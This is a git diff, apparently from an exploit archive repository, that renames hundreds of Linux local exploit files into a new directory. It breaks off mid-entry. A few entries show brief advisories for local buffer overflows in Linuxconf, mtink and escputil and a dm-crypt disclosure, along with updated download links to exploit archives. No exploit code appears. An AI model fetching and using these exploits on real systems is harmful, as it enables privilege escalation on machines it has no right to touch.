diff --git a/platforms/linux/local/217.c b/exploits/linux/local/217.c similarity index 100% rename from platforms/linux/local/217.c rename to exploits/linux/local/217.c diff --git a/platforms/linux/local/21700.c b/exploits/linux/local/21700.c similarity index 100% rename from platforms/linux/local/21700.c rename to exploits/linux/local/21700.c diff --git a/platforms/linux/local/21701.pl b/exploits/linux/local/21701.pl similarity index 100% rename from platforms/linux/local/21701.pl rename to exploits/linux/local/21701.pl diff --git a/platforms/linux/local/21732.txt b/exploits/linux/local/21732.txt similarity index 100% rename from platforms/linux/local/21732.txt rename to exploits/linux/local/21732.txt diff --git a/platforms/linux/local/21733.sh b/exploits/linux/local/21733.sh similarity index 100% rename from platforms/linux/local/21733.sh rename to exploits/linux/local/21733.sh diff --git a/platforms/linux/local/21761.c b/exploits/linux/local/21761.c similarity index 100% rename from platforms/linux/local/21761.c rename to exploits/linux/local/21761.c diff --git a/platforms/linux/local/21762.c b/exploits/linux/local/21762.c similarity index 100% rename from platforms/linux/local/21762.c rename to exploits/linux/local/21762.c diff --git a/platforms/linux/local/21763.txt b/exploits/linux/local/21763.txt similarity index 93% rename from platforms/linux/local/21763.txt rename to exploits/linux/local/21763.txt index 3072db3c1..928281b2e 100644 --- a/platforms/linux/local/21763.txt +++ b/exploits/linux/local/21763.txt @@ -4,4 +4,4 @@ Linuxconf is a Linux configuration utility from Solucorp. It is typically instal A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21763.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21763.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/21793.txt b/exploits/linux/local/21793.txt similarity index 100% rename from platforms/linux/local/21793.txt rename to exploits/linux/local/21793.txt diff --git a/platforms/linux/local/218.c b/exploits/linux/local/218.c similarity index 100% rename from platforms/linux/local/218.c rename to exploits/linux/local/218.c diff --git a/platforms/linux/local/21814.c b/exploits/linux/local/21814.c similarity index 100% rename from platforms/linux/local/21814.c rename to exploits/linux/local/21814.c diff --git a/platforms/linux/local/21848.rb b/exploits/linux/local/21848.rb similarity index 100% rename from platforms/linux/local/21848.rb rename to exploits/linux/local/21848.rb diff --git a/platforms/linux/local/21865.c b/exploits/linux/local/21865.c similarity index 100% rename from platforms/linux/local/21865.c rename to exploits/linux/local/21865.c diff --git a/platforms/linux/local/21871.c b/exploits/linux/local/21871.c similarity index 100% rename from platforms/linux/local/21871.c rename to exploits/linux/local/21871.c diff --git a/platforms/linux/local/21872.c b/exploits/linux/local/21872.c similarity index 100% rename from platforms/linux/local/21872.c rename to exploits/linux/local/21872.c diff --git a/platforms/linux/local/219.c b/exploits/linux/local/219.c similarity index 100% rename from platforms/linux/local/219.c rename to exploits/linux/local/219.c diff --git a/platforms/linux/local/2193.php b/exploits/linux/local/2193.php similarity index 100% rename from platforms/linux/local/2193.php rename to exploits/linux/local/2193.php diff --git a/platforms/linux/local/21980.c b/exploits/linux/local/21980.c similarity index 100% rename from platforms/linux/local/21980.c rename to exploits/linux/local/21980.c diff --git a/platforms/linux/local/22002.txt b/exploits/linux/local/22002.txt similarity index 100% rename from platforms/linux/local/22002.txt rename to exploits/linux/local/22002.txt diff --git a/platforms/linux/local/22014.c b/exploits/linux/local/22014.c similarity index 100% rename from platforms/linux/local/22014.c rename to exploits/linux/local/22014.c diff --git a/platforms/linux/local/22055.txt b/exploits/linux/local/22055.txt similarity index 100% rename from platforms/linux/local/22055.txt rename to exploits/linux/local/22055.txt diff --git a/platforms/linux/local/22066.c b/exploits/linux/local/22066.c similarity index 100% rename from platforms/linux/local/22066.c rename to exploits/linux/local/22066.c diff --git a/platforms/linux/local/221.c b/exploits/linux/local/221.c similarity index 100% rename from platforms/linux/local/221.c rename to exploits/linux/local/221.c diff --git a/platforms/linux/local/22128.c b/exploits/linux/local/22128.c similarity index 100% rename from platforms/linux/local/22128.c rename to exploits/linux/local/22128.c diff --git a/platforms/linux/local/22189.txt b/exploits/linux/local/22189.txt similarity index 92% rename from platforms/linux/local/22189.txt rename to exploits/linux/local/22189.txt index 48ccb1982..79f577b2d 100644 --- a/platforms/linux/local/22189.txt +++ b/exploits/linux/local/22189.txt @@ -4,4 +4,4 @@ mtink is prone to a locally exploitable buffer overflow condition. This is due t mtink is reportedly installed setgid 'sys' on Mandrake Linux, so it is possible that this issue may be exploited to execute arbitrary code with elevated privileges. Other distributions may also be affected if mtink is installed or runs with elevated privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22189.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22189.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/22190.txt b/exploits/linux/local/22190.txt similarity index 92% rename from platforms/linux/local/22190.txt rename to exploits/linux/local/22190.txt index 41ec38e45..1a60427d4 100644 --- a/platforms/linux/local/22190.txt +++ b/exploits/linux/local/22190.txt @@ -4,4 +4,4 @@ It has been reported that a buffer overflow in escputil exists. When supplied wi escputil is reportedly installed setgid 'sys' on Mandrake Linux, so it is possible that this issue may be exploited to execute arbitrary code with elevated privileges. Other distributions may also be affected if the utility is installed or runs with elevated privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22190.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22190.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/222.c b/exploits/linux/local/222.c similarity index 100% rename from platforms/linux/local/222.c rename to exploits/linux/local/222.c diff --git a/platforms/linux/local/22212.txt b/exploits/linux/local/22212.txt similarity index 100% rename from platforms/linux/local/22212.txt rename to exploits/linux/local/22212.txt diff --git a/platforms/linux/local/22233.c b/exploits/linux/local/22233.c similarity index 100% rename from platforms/linux/local/22233.c rename to exploits/linux/local/22233.c diff --git a/platforms/linux/local/22234.c b/exploits/linux/local/22234.c similarity index 100% rename from platforms/linux/local/22234.c rename to exploits/linux/local/22234.c diff --git a/platforms/linux/local/22235.pl b/exploits/linux/local/22235.pl similarity index 100% rename from platforms/linux/local/22235.pl rename to exploits/linux/local/22235.pl diff --git a/platforms/linux/local/22265.pl b/exploits/linux/local/22265.pl similarity index 100% rename from platforms/linux/local/22265.pl rename to exploits/linux/local/22265.pl diff --git a/platforms/linux/local/22320.c b/exploits/linux/local/22320.c similarity index 100% rename from platforms/linux/local/22320.c rename to exploits/linux/local/22320.c diff --git a/platforms/linux/local/22321.c b/exploits/linux/local/22321.c similarity index 100% rename from platforms/linux/local/22321.c rename to exploits/linux/local/22321.c diff --git a/platforms/linux/local/22322.c b/exploits/linux/local/22322.c similarity index 100% rename from platforms/linux/local/22322.c rename to exploits/linux/local/22322.c diff --git a/platforms/linux/local/22323.c b/exploits/linux/local/22323.c similarity index 100% rename from platforms/linux/local/22323.c rename to exploits/linux/local/22323.c diff --git a/platforms/linux/local/22326.c b/exploits/linux/local/22326.c similarity index 100% rename from platforms/linux/local/22326.c rename to exploits/linux/local/22326.c diff --git a/platforms/linux/local/22340.txt b/exploits/linux/local/22340.txt similarity index 100% rename from platforms/linux/local/22340.txt rename to exploits/linux/local/22340.txt diff --git a/platforms/linux/local/22344.txt b/exploits/linux/local/22344.txt similarity index 100% rename from platforms/linux/local/22344.txt rename to exploits/linux/local/22344.txt diff --git a/platforms/linux/local/22362.c b/exploits/linux/local/22362.c similarity index 100% rename from platforms/linux/local/22362.c rename to exploits/linux/local/22362.c diff --git a/platforms/linux/local/22363.c b/exploits/linux/local/22363.c similarity index 100% rename from platforms/linux/local/22363.c rename to exploits/linux/local/22363.c diff --git a/platforms/linux/local/22376.txt b/exploits/linux/local/22376.txt similarity index 100% rename from platforms/linux/local/22376.txt rename to exploits/linux/local/22376.txt diff --git a/platforms/linux/local/22452.sh b/exploits/linux/local/22452.sh similarity index 100% rename from platforms/linux/local/22452.sh rename to exploits/linux/local/22452.sh diff --git a/platforms/linux/local/22456.txt b/exploits/linux/local/22456.txt similarity index 100% rename from platforms/linux/local/22456.txt rename to exploits/linux/local/22456.txt diff --git a/platforms/linux/local/22458.c b/exploits/linux/local/22458.c similarity index 100% rename from platforms/linux/local/22458.c rename to exploits/linux/local/22458.c diff --git a/platforms/linux/local/22531.pl b/exploits/linux/local/22531.pl similarity index 100% rename from platforms/linux/local/22531.pl rename to exploits/linux/local/22531.pl diff --git a/platforms/linux/local/22538.pl b/exploits/linux/local/22538.pl similarity index 100% rename from platforms/linux/local/22538.pl rename to exploits/linux/local/22538.pl diff --git a/platforms/linux/local/22540.c b/exploits/linux/local/22540.c similarity index 100% rename from platforms/linux/local/22540.c rename to exploits/linux/local/22540.c diff --git a/platforms/linux/local/22565.c b/exploits/linux/local/22565.c similarity index 100% rename from platforms/linux/local/22565.c rename to exploits/linux/local/22565.c diff --git a/platforms/linux/local/22567.c b/exploits/linux/local/22567.c similarity index 100% rename from platforms/linux/local/22567.c rename to exploits/linux/local/22567.c diff --git a/platforms/linux/local/22594.c b/exploits/linux/local/22594.c similarity index 100% rename from platforms/linux/local/22594.c rename to exploits/linux/local/22594.c diff --git a/platforms/linux/local/22616.pl b/exploits/linux/local/22616.pl similarity index 100% rename from platforms/linux/local/22616.pl rename to exploits/linux/local/22616.pl diff --git a/platforms/linux/local/22617.c b/exploits/linux/local/22617.c similarity index 100% rename from platforms/linux/local/22617.c rename to exploits/linux/local/22617.c diff --git a/platforms/linux/local/22633.c b/exploits/linux/local/22633.c similarity index 100% rename from platforms/linux/local/22633.c rename to exploits/linux/local/22633.c diff --git a/platforms/linux/local/22640.c b/exploits/linux/local/22640.c similarity index 100% rename from platforms/linux/local/22640.c rename to exploits/linux/local/22640.c diff --git a/platforms/linux/local/22643.pl b/exploits/linux/local/22643.pl similarity index 100% rename from platforms/linux/local/22643.pl rename to exploits/linux/local/22643.pl diff --git a/platforms/linux/local/22644.c b/exploits/linux/local/22644.c similarity index 100% rename from platforms/linux/local/22644.c rename to exploits/linux/local/22644.c diff --git a/platforms/linux/local/22645.c b/exploits/linux/local/22645.c similarity index 100% rename from platforms/linux/local/22645.c rename to exploits/linux/local/22645.c diff --git a/platforms/linux/local/22683.pl b/exploits/linux/local/22683.pl similarity index 100% rename from platforms/linux/local/22683.pl rename to exploits/linux/local/22683.pl diff --git a/platforms/linux/local/22695.pl b/exploits/linux/local/22695.pl similarity index 100% rename from platforms/linux/local/22695.pl rename to exploits/linux/local/22695.pl diff --git a/platforms/linux/local/22703.c b/exploits/linux/local/22703.c similarity index 100% rename from platforms/linux/local/22703.c rename to exploits/linux/local/22703.c diff --git a/platforms/linux/local/22719.pl b/exploits/linux/local/22719.pl similarity index 100% rename from platforms/linux/local/22719.pl rename to exploits/linux/local/22719.pl diff --git a/platforms/linux/local/22720.c b/exploits/linux/local/22720.c similarity index 100% rename from platforms/linux/local/22720.c rename to exploits/linux/local/22720.c diff --git a/platforms/linux/local/22729.c b/exploits/linux/local/22729.c similarity index 100% rename from platforms/linux/local/22729.c rename to exploits/linux/local/22729.c diff --git a/platforms/linux/local/22745.c b/exploits/linux/local/22745.c similarity index 100% rename from platforms/linux/local/22745.c rename to exploits/linux/local/22745.c diff --git a/platforms/linux/local/22748.c b/exploits/linux/local/22748.c similarity index 100% rename from platforms/linux/local/22748.c rename to exploits/linux/local/22748.c diff --git a/platforms/linux/local/22768.pl b/exploits/linux/local/22768.pl similarity index 100% rename from platforms/linux/local/22768.pl rename to exploits/linux/local/22768.pl diff --git a/platforms/linux/local/22773.c b/exploits/linux/local/22773.c similarity index 100% rename from platforms/linux/local/22773.c rename to exploits/linux/local/22773.c diff --git a/platforms/linux/local/22775.txt b/exploits/linux/local/22775.txt similarity index 100% rename from platforms/linux/local/22775.txt rename to exploits/linux/local/22775.txt diff --git a/platforms/linux/local/22781.txt b/exploits/linux/local/22781.txt similarity index 100% rename from platforms/linux/local/22781.txt rename to exploits/linux/local/22781.txt diff --git a/platforms/linux/local/22806.sh b/exploits/linux/local/22806.sh similarity index 100% rename from platforms/linux/local/22806.sh rename to exploits/linux/local/22806.sh diff --git a/platforms/linux/local/22813.c b/exploits/linux/local/22813.c similarity index 100% rename from platforms/linux/local/22813.c rename to exploits/linux/local/22813.c diff --git a/platforms/linux/local/22815.c b/exploits/linux/local/22815.c similarity index 100% rename from platforms/linux/local/22815.c rename to exploits/linux/local/22815.c diff --git a/platforms/linux/local/22836.pl b/exploits/linux/local/22836.pl similarity index 100% rename from platforms/linux/local/22836.pl rename to exploits/linux/local/22836.pl diff --git a/platforms/linux/local/22840.c b/exploits/linux/local/22840.c similarity index 100% rename from platforms/linux/local/22840.c rename to exploits/linux/local/22840.c diff --git a/platforms/linux/local/22847.txt b/exploits/linux/local/22847.txt similarity index 100% rename from platforms/linux/local/22847.txt rename to exploits/linux/local/22847.txt diff --git a/platforms/linux/local/22860.c b/exploits/linux/local/22860.c similarity index 100% rename from platforms/linux/local/22860.c rename to exploits/linux/local/22860.c diff --git a/platforms/linux/local/22861.c b/exploits/linux/local/22861.c similarity index 100% rename from platforms/linux/local/22861.c rename to exploits/linux/local/22861.c diff --git a/platforms/linux/local/22862.c b/exploits/linux/local/22862.c similarity index 100% rename from platforms/linux/local/22862.c rename to exploits/linux/local/22862.c diff --git a/platforms/linux/local/22863.c b/exploits/linux/local/22863.c similarity index 100% rename from platforms/linux/local/22863.c rename to exploits/linux/local/22863.c diff --git a/platforms/linux/local/22884.c b/exploits/linux/local/22884.c similarity index 100% rename from platforms/linux/local/22884.c rename to exploits/linux/local/22884.c diff --git a/platforms/linux/local/229.c b/exploits/linux/local/229.c similarity index 100% rename from platforms/linux/local/229.c rename to exploits/linux/local/229.c diff --git a/platforms/linux/local/22928.pl b/exploits/linux/local/22928.pl similarity index 100% rename from platforms/linux/local/22928.pl rename to exploits/linux/local/22928.pl diff --git a/platforms/linux/local/22943.c b/exploits/linux/local/22943.c similarity index 100% rename from platforms/linux/local/22943.c rename to exploits/linux/local/22943.c diff --git a/platforms/linux/local/22965.c b/exploits/linux/local/22965.c similarity index 100% rename from platforms/linux/local/22965.c rename to exploits/linux/local/22965.c diff --git a/platforms/linux/local/22971.txt b/exploits/linux/local/22971.txt similarity index 100% rename from platforms/linux/local/22971.txt rename to exploits/linux/local/22971.txt diff --git a/platforms/linux/local/22979.txt b/exploits/linux/local/22979.txt similarity index 100% rename from platforms/linux/local/22979.txt rename to exploits/linux/local/22979.txt diff --git a/platforms/linux/local/22984.c b/exploits/linux/local/22984.c similarity index 100% rename from platforms/linux/local/22984.c rename to exploits/linux/local/22984.c diff --git a/platforms/linux/local/22985.c b/exploits/linux/local/22985.c similarity index 100% rename from platforms/linux/local/22985.c rename to exploits/linux/local/22985.c diff --git a/platforms/linux/local/22993.txt b/exploits/linux/local/22993.txt similarity index 100% rename from platforms/linux/local/22993.txt rename to exploits/linux/local/22993.txt diff --git a/platforms/linux/local/22996.c b/exploits/linux/local/22996.c similarity index 100% rename from platforms/linux/local/22996.c rename to exploits/linux/local/22996.c diff --git a/platforms/linux/local/23045.pl b/exploits/linux/local/23045.pl similarity index 100% rename from platforms/linux/local/23045.pl rename to exploits/linux/local/23045.pl diff --git a/platforms/linux/local/23077.pl b/exploits/linux/local/23077.pl similarity index 100% rename from platforms/linux/local/23077.pl rename to exploits/linux/local/23077.pl diff --git a/platforms/linux/local/231.sh b/exploits/linux/local/231.sh similarity index 100% rename from platforms/linux/local/231.sh rename to exploits/linux/local/231.sh diff --git a/platforms/linux/local/23119.c b/exploits/linux/local/23119.c similarity index 100% rename from platforms/linux/local/23119.c rename to exploits/linux/local/23119.c diff --git a/platforms/linux/local/23126.c b/exploits/linux/local/23126.c similarity index 100% rename from platforms/linux/local/23126.c rename to exploits/linux/local/23126.c diff --git a/platforms/linux/local/23154.c b/exploits/linux/local/23154.c similarity index 100% rename from platforms/linux/local/23154.c rename to exploits/linux/local/23154.c diff --git a/platforms/linux/local/23168.pl b/exploits/linux/local/23168.pl similarity index 100% rename from platforms/linux/local/23168.pl rename to exploits/linux/local/23168.pl diff --git a/platforms/linux/local/23189.c b/exploits/linux/local/23189.c similarity index 100% rename from platforms/linux/local/23189.c rename to exploits/linux/local/23189.c diff --git a/platforms/linux/local/23197.c b/exploits/linux/local/23197.c similarity index 100% rename from platforms/linux/local/23197.c rename to exploits/linux/local/23197.c diff --git a/platforms/linux/local/23204.c b/exploits/linux/local/23204.c similarity index 100% rename from platforms/linux/local/23204.c rename to exploits/linux/local/23204.c diff --git a/platforms/linux/local/23223.c b/exploits/linux/local/23223.c similarity index 100% rename from platforms/linux/local/23223.c rename to exploits/linux/local/23223.c diff --git a/platforms/linux/local/23228.c b/exploits/linux/local/23228.c similarity index 100% rename from platforms/linux/local/23228.c rename to exploits/linux/local/23228.c diff --git a/platforms/linux/local/23251.txt b/exploits/linux/local/23251.txt similarity index 100% rename from platforms/linux/local/23251.txt rename to exploits/linux/local/23251.txt diff --git a/platforms/linux/local/23258.c b/exploits/linux/local/23258.c similarity index 100% rename from platforms/linux/local/23258.c rename to exploits/linux/local/23258.c diff --git a/platforms/linux/local/23297.c b/exploits/linux/local/23297.c similarity index 100% rename from platforms/linux/local/23297.c rename to exploits/linux/local/23297.c diff --git a/platforms/linux/local/23299.c b/exploits/linux/local/23299.c similarity index 100% rename from platforms/linux/local/23299.c rename to exploits/linux/local/23299.c diff --git a/platforms/linux/local/23300.c b/exploits/linux/local/23300.c similarity index 100% rename from platforms/linux/local/23300.c rename to exploits/linux/local/23300.c diff --git a/platforms/linux/local/23301.c b/exploits/linux/local/23301.c similarity index 100% rename from platforms/linux/local/23301.c rename to exploits/linux/local/23301.c diff --git a/platforms/linux/local/23303.c b/exploits/linux/local/23303.c similarity index 100% rename from platforms/linux/local/23303.c rename to exploits/linux/local/23303.c diff --git a/platforms/linux/local/23308.c b/exploits/linux/local/23308.c similarity index 100% rename from platforms/linux/local/23308.c rename to exploits/linux/local/23308.c diff --git a/platforms/linux/local/23344.txt b/exploits/linux/local/23344.txt similarity index 100% rename from platforms/linux/local/23344.txt rename to exploits/linux/local/23344.txt diff --git a/platforms/linux/local/23345.txt b/exploits/linux/local/23345.txt similarity index 100% rename from platforms/linux/local/23345.txt rename to exploits/linux/local/23345.txt diff --git a/platforms/linux/local/23346.txt b/exploits/linux/local/23346.txt similarity index 100% rename from platforms/linux/local/23346.txt rename to exploits/linux/local/23346.txt diff --git a/platforms/linux/local/23350.c b/exploits/linux/local/23350.c similarity index 100% rename from platforms/linux/local/23350.c rename to exploits/linux/local/23350.c diff --git a/platforms/linux/local/23351.c b/exploits/linux/local/23351.c similarity index 100% rename from platforms/linux/local/23351.c rename to exploits/linux/local/23351.c diff --git a/platforms/linux/local/23352.c b/exploits/linux/local/23352.c similarity index 100% rename from platforms/linux/local/23352.c rename to exploits/linux/local/23352.c diff --git a/platforms/linux/local/23364.sh b/exploits/linux/local/23364.sh similarity index 100% rename from platforms/linux/local/23364.sh rename to exploits/linux/local/23364.sh diff --git a/platforms/linux/local/2338.c b/exploits/linux/local/2338.c similarity index 100% rename from platforms/linux/local/2338.c rename to exploits/linux/local/2338.c diff --git a/platforms/linux/local/23414.txt b/exploits/linux/local/23414.txt similarity index 100% rename from platforms/linux/local/23414.txt rename to exploits/linux/local/23414.txt diff --git a/platforms/linux/local/23479.sh b/exploits/linux/local/23479.sh similarity index 100% rename from platforms/linux/local/23479.sh rename to exploits/linux/local/23479.sh diff --git a/platforms/linux/local/23481.c b/exploits/linux/local/23481.c similarity index 100% rename from platforms/linux/local/23481.c rename to exploits/linux/local/23481.c diff --git a/platforms/linux/local/23482.c b/exploits/linux/local/23482.c similarity index 100% rename from platforms/linux/local/23482.c rename to exploits/linux/local/23482.c diff --git a/platforms/linux/local/23510.c b/exploits/linux/local/23510.c similarity index 100% rename from platforms/linux/local/23510.c rename to exploits/linux/local/23510.c diff --git a/platforms/linux/local/23581.pl b/exploits/linux/local/23581.pl similarity index 100% rename from platforms/linux/local/23581.pl rename to exploits/linux/local/23581.pl diff --git a/platforms/linux/local/23634.c b/exploits/linux/local/23634.c similarity index 100% rename from platforms/linux/local/23634.c rename to exploits/linux/local/23634.c diff --git a/platforms/linux/local/23658.c b/exploits/linux/local/23658.c similarity index 100% rename from platforms/linux/local/23658.c rename to exploits/linux/local/23658.c diff --git a/platforms/linux/local/23674.txt b/exploits/linux/local/23674.txt similarity index 100% rename from platforms/linux/local/23674.txt rename to exploits/linux/local/23674.txt diff --git a/platforms/linux/local/23682.c b/exploits/linux/local/23682.c similarity index 100% rename from platforms/linux/local/23682.c rename to exploits/linux/local/23682.c diff --git a/platforms/linux/local/23738.c b/exploits/linux/local/23738.c similarity index 100% rename from platforms/linux/local/23738.c rename to exploits/linux/local/23738.c diff --git a/platforms/linux/local/23743.txt b/exploits/linux/local/23743.txt similarity index 100% rename from platforms/linux/local/23743.txt rename to exploits/linux/local/23743.txt diff --git a/platforms/linux/local/23759.pl b/exploits/linux/local/23759.pl similarity index 100% rename from platforms/linux/local/23759.pl rename to exploits/linux/local/23759.pl diff --git a/platforms/linux/local/23849.txt b/exploits/linux/local/23849.txt similarity index 100% rename from platforms/linux/local/23849.txt rename to exploits/linux/local/23849.txt diff --git a/platforms/linux/local/23882.pas b/exploits/linux/local/23882.pas similarity index 100% rename from platforms/linux/local/23882.pas rename to exploits/linux/local/23882.pas diff --git a/platforms/linux/local/23892.c b/exploits/linux/local/23892.c similarity index 100% rename from platforms/linux/local/23892.c rename to exploits/linux/local/23892.c diff --git a/platforms/linux/local/24027.txt b/exploits/linux/local/24027.txt similarity index 100% rename from platforms/linux/local/24027.txt rename to exploits/linux/local/24027.txt diff --git a/platforms/linux/local/2404.c b/exploits/linux/local/2404.c similarity index 100% rename from platforms/linux/local/2404.c rename to exploits/linux/local/2404.c diff --git a/platforms/linux/local/24043.c b/exploits/linux/local/24043.c similarity index 100% rename from platforms/linux/local/24043.c rename to exploits/linux/local/24043.c diff --git a/platforms/linux/local/24123.sh b/exploits/linux/local/24123.sh similarity index 100% rename from platforms/linux/local/24123.sh rename to exploits/linux/local/24123.sh diff --git a/platforms/linux/local/24141.txt b/exploits/linux/local/24141.txt similarity index 100% rename from platforms/linux/local/24141.txt rename to exploits/linux/local/24141.txt diff --git a/platforms/linux/local/24182.c b/exploits/linux/local/24182.c similarity index 100% rename from platforms/linux/local/24182.c rename to exploits/linux/local/24182.c diff --git a/platforms/linux/local/24278.sh b/exploits/linux/local/24278.sh similarity index 100% rename from platforms/linux/local/24278.sh rename to exploits/linux/local/24278.sh diff --git a/platforms/linux/local/24398.sh b/exploits/linux/local/24398.sh similarity index 100% rename from platforms/linux/local/24398.sh rename to exploits/linux/local/24398.sh diff --git a/platforms/linux/local/24406.txt b/exploits/linux/local/24406.txt similarity index 100% rename from platforms/linux/local/24406.txt rename to exploits/linux/local/24406.txt diff --git a/platforms/linux/local/24421.c b/exploits/linux/local/24421.c similarity index 100% rename from platforms/linux/local/24421.c rename to exploits/linux/local/24421.c diff --git a/platforms/linux/local/24458.txt b/exploits/linux/local/24458.txt similarity index 100% rename from platforms/linux/local/24458.txt rename to exploits/linux/local/24458.txt diff --git a/platforms/linux/local/24459.sh b/exploits/linux/local/24459.sh similarity index 100% rename from platforms/linux/local/24459.sh rename to exploits/linux/local/24459.sh diff --git a/platforms/linux/local/24570.txt b/exploits/linux/local/24570.txt similarity index 100% rename from platforms/linux/local/24570.txt rename to exploits/linux/local/24570.txt diff --git a/platforms/linux/local/24606.c b/exploits/linux/local/24606.c similarity index 100% rename from platforms/linux/local/24606.c rename to exploits/linux/local/24606.c diff --git a/platforms/linux/local/2466.pl b/exploits/linux/local/2466.pl similarity index 100% rename from platforms/linux/local/2466.pl rename to exploits/linux/local/2466.pl diff --git a/platforms/linux/local/24694.c b/exploits/linux/local/24694.c similarity index 100% rename from platforms/linux/local/24694.c rename to exploits/linux/local/24694.c diff --git a/platforms/linux/local/24749.sh b/exploits/linux/local/24749.sh similarity index 100% rename from platforms/linux/local/24749.sh rename to exploits/linux/local/24749.sh diff --git a/platforms/linux/local/24750.c b/exploits/linux/local/24750.c similarity index 100% rename from platforms/linux/local/24750.c rename to exploits/linux/local/24750.c diff --git a/platforms/linux/local/24757.java b/exploits/linux/local/24757.java similarity index 100% rename from platforms/linux/local/24757.java rename to exploits/linux/local/24757.java diff --git a/platforms/linux/local/24758.java b/exploits/linux/local/24758.java similarity index 100% rename from platforms/linux/local/24758.java rename to exploits/linux/local/24758.java diff --git a/platforms/linux/local/249.c b/exploits/linux/local/249.c similarity index 100% rename from platforms/linux/local/249.c rename to exploits/linux/local/249.c diff --git a/platforms/linux/local/2492.s b/exploits/linux/local/2492.s similarity index 100% rename from platforms/linux/local/2492.s rename to exploits/linux/local/2492.s diff --git a/platforms/linux/local/24929.rb b/exploits/linux/local/24929.rb similarity index 100% rename from platforms/linux/local/24929.rb rename to exploits/linux/local/24929.rb diff --git a/platforms/linux/local/24933.txt b/exploits/linux/local/24933.txt similarity index 100% rename from platforms/linux/local/24933.txt rename to exploits/linux/local/24933.txt diff --git a/platforms/linux/local/25080.txt b/exploits/linux/local/25080.txt similarity index 100% rename from platforms/linux/local/25080.txt rename to exploits/linux/local/25080.txt diff --git a/platforms/linux/local/25106.c b/exploits/linux/local/25106.c similarity index 100% rename from platforms/linux/local/25106.c rename to exploits/linux/local/25106.c diff --git a/platforms/linux/local/25134.c b/exploits/linux/local/25134.c similarity index 100% rename from platforms/linux/local/25134.c rename to exploits/linux/local/25134.c diff --git a/platforms/linux/local/252.pl b/exploits/linux/local/252.pl similarity index 100% rename from platforms/linux/local/252.pl rename to exploits/linux/local/252.pl diff --git a/platforms/linux/local/25202.c b/exploits/linux/local/25202.c similarity index 100% rename from platforms/linux/local/25202.c rename to exploits/linux/local/25202.c diff --git a/platforms/linux/local/25288.c b/exploits/linux/local/25288.c similarity index 100% rename from platforms/linux/local/25288.c rename to exploits/linux/local/25288.c diff --git a/platforms/linux/local/25289.c b/exploits/linux/local/25289.c similarity index 100% rename from platforms/linux/local/25289.c rename to exploits/linux/local/25289.c diff --git a/platforms/linux/local/25406.sh b/exploits/linux/local/25406.sh similarity index 100% rename from platforms/linux/local/25406.sh rename to exploits/linux/local/25406.sh diff --git a/platforms/linux/local/25411.py b/exploits/linux/local/25411.py similarity index 100% rename from platforms/linux/local/25411.py rename to exploits/linux/local/25411.py diff --git a/platforms/linux/local/25444.c b/exploits/linux/local/25444.c similarity index 100% rename from platforms/linux/local/25444.c rename to exploits/linux/local/25444.c diff --git a/platforms/linux/local/25450.c b/exploits/linux/local/25450.c similarity index 100% rename from platforms/linux/local/25450.c rename to exploits/linux/local/25450.c diff --git a/platforms/linux/local/255.pl b/exploits/linux/local/255.pl similarity index 100% rename from platforms/linux/local/255.pl rename to exploits/linux/local/255.pl diff --git a/platforms/linux/local/25688.txt b/exploits/linux/local/25688.txt similarity index 100% rename from platforms/linux/local/25688.txt rename to exploits/linux/local/25688.txt diff --git a/platforms/linux/local/257.pl b/exploits/linux/local/257.pl similarity index 100% rename from platforms/linux/local/257.pl rename to exploits/linux/local/257.pl diff --git a/platforms/linux/local/25707.txt b/exploits/linux/local/25707.txt similarity index 91% rename from platforms/linux/local/25707.txt rename to exploits/linux/local/25707.txt index 4b0731a1f..f7bd0d758 100644 --- a/platforms/linux/local/25707.txt +++ b/exploits/linux/local/25707.txt @@ -4,4 +4,4 @@ Both cryptoloop and dm-crypt are reported prone to an information disclosure vul It should be noted that a successful attack would reveal the presence of a watermarked file but not the file contents. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25707.tar.bz2 \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25707.tar.bz2 \ No newline at end of file diff --git a/platforms/linux/local/25709.sh b/exploits/linux/local/25709.sh similarity index 100% rename from platforms/linux/local/25709.sh rename to exploits/linux/local/25709.sh diff --git a/platforms/linux/local/25789.c b/exploits/linux/local/25789.c similarity index 100% rename from platforms/linux/local/25789.c rename to exploits/linux/local/25789.c diff --git a/platforms/linux/local/258.sh b/exploits/linux/local/258.sh similarity index 100% rename from platforms/linux/local/258.sh rename to exploits/linux/local/258.sh diff --git a/platforms/linux/local/2581.c b/exploits/linux/local/2581.c similarity index 100% rename from platforms/linux/local/2581.c rename to exploits/linux/local/2581.c diff --git a/platforms/linux/local/25947.txt b/exploits/linux/local/25947.txt similarity index 100% rename from platforms/linux/local/25947.txt rename to exploits/linux/local/25947.txt diff --git a/platforms/linux/local/25993.sh b/exploits/linux/local/25993.sh similarity index 100% rename from platforms/linux/local/25993.sh rename to exploits/linux/local/25993.sh diff --git a/platforms/linux/local/260.c b/exploits/linux/local/260.c similarity index 100% rename from platforms/linux/local/260.c rename to exploits/linux/local/260.c diff --git a/platforms/linux/local/26100.sh b/exploits/linux/local/26100.sh similarity index 100% rename from platforms/linux/local/26100.sh rename to exploits/linux/local/26100.sh diff --git a/platforms/linux/local/26195.txt b/exploits/linux/local/26195.txt similarity index 100% rename from platforms/linux/local/26195.txt rename to exploits/linux/local/26195.txt diff --git a/platforms/linux/local/26218.txt b/exploits/linux/local/26218.txt similarity index 100% rename from platforms/linux/local/26218.txt rename to exploits/linux/local/26218.txt diff --git a/platforms/linux/local/26321.c b/exploits/linux/local/26321.c similarity index 100% rename from platforms/linux/local/26321.c rename to exploits/linux/local/26321.c diff --git a/platforms/linux/local/26353.txt b/exploits/linux/local/26353.txt similarity index 100% rename from platforms/linux/local/26353.txt rename to exploits/linux/local/26353.txt diff --git 